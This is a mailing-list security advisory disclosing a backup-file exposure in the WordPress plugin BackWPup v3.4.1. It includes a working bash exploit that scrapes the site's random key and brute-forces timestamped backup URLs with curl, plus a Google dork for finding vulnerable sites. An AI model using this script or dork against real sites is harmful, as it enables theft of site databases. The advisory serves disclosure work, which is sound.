Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 27 Sep 2017 12:13:47 -0400
From: "Larry W. Cashdollar" <larry0@...com>
To: Open Source Security <oss-security@...ts.openwall.com>
Subject: Vulnerability in Wordpress Plugin backwpup v3.4.1 possible brute
 forcing of backup file download

Title: Vulnerability in Wordpress Plugin backwpup v3.4.1 possible brute forcing of backup file download
Author: Larry W. Cashdollar, @_larry0
Date: 2017-09-08
CVE-ID:[CVE-2017-2551]
Download Site: https://wordpress.org/plugins/backwpup
Vendor: Inpsyde
Vendor Notified: 2017-09-08, fixed v3.4.2
Vendor Contact: plugins@...dpress.org
Advisory: http://www.vapidlabs.com/advisory.php?v=201
Description: "The backup plugin BackWPup can be used to save your complete installation including /wp-content/ and push them to an external Backup Service, like Dropbox, S3, FTP and many more."
Vulnerability:
There is a weakness in the way backwpup creates and stores the backup files it generates.  It creates a random string to obscure the location, but
it uses that same string to create the storage directory under wp-content/uploads/ which in most installations of WordPress allows file listings.

Someone looking to steal a copy of the database could simply list the directories in /uploads to find that random string and then brute force the location of the file as its structure is just a date and time stamp.  It would take a Maximum of 86400 tries to guess if a backup is available for that day.  
Filename format: 
backwpup_ RANDOMSTRINGBACKUPNUMBER_%Y-%m-%d_%H-%i-%s

Default settings are:

%d = Two digit day of the month, with leading zeros
%m = Day of the month, with leading zeros
%Y = Four digit representation for the year
%H = Hour in 24-hour format, with leading zeros
%i = Two digit representation of the minute
%s = Two digit representation of the second

https://wordpress.org/plugins/backwpup


Exploit Code:
	• #!/bin/bash
	• #Exploit for Wordpress Plugin BackWPup v3.4.1
	• #Download https://wordpress.org/plugins/backwpup
	• #CWE-552: Files or Directories Accessible to External Parties
	• #CVE-ID: CVE-2017-2551
	• #Google Dork: inurl:wp-content/uploads/backwpup
	•  
	•  
	• #Add banner about vulnerability
	•  
	• KEY=`curl --silent http://$1/wp-content/uploads/|html2text |grep backups | awk -F- '{print $2}'`
	•  
	• #Add error checking here
	• echo "[+] Getting Unique Key $KEY"
	• DIR="backwpup-$KEY-backups"
	• echo "[+] Checking directory $DIR"
	• WPATH="$DIR/backwpup_$KEY"
	• echo "[+] Creating Path: $WPATH"
	• #use date command here for the default date of current day
	• MONTH=09
	• DAY=07
	• YEAR=2017
	• Z=0
	•  
	• echo "[+] Scanning website for available backups:"
	• for y in `seq -w 0 23`; do
	•         for x in `seq -w 0 59`; do
	•                  Y=`echo "scale=2;($Z/86000)*100"|bc`;
	•                  echo -ne "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b$CWPATH $Y%"
	•         for z in `seq -w 0 59`; do
	•                  Z=$(( $Z + 1 ));
	•                  CWPATH="http://$1/wp-content/uploads/$WPATH"01"_"$YEAR"-"$MONTH"-"$DAY"_"$y"-"$x"-"$z".zip";
	•                  RESULT=`curl -s --head $CWPATH|grep 200`;
	•                 if [ -n "$RESULT" ]; then
	•                  echo ""
	•                  echo "[+] Location $CWPATH Found";
	•                  echo "[+] Received $RESULT";
	•                  echo "Downloading......";
	•                 # wget $CWPATH
	•                   exit;
	•                 fi;
	•         done
	•         done
	• done
	• echo "Completed."
Screen Shots:
Notes: Google Dork: inurl:wp-content/uploads/backwpup

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ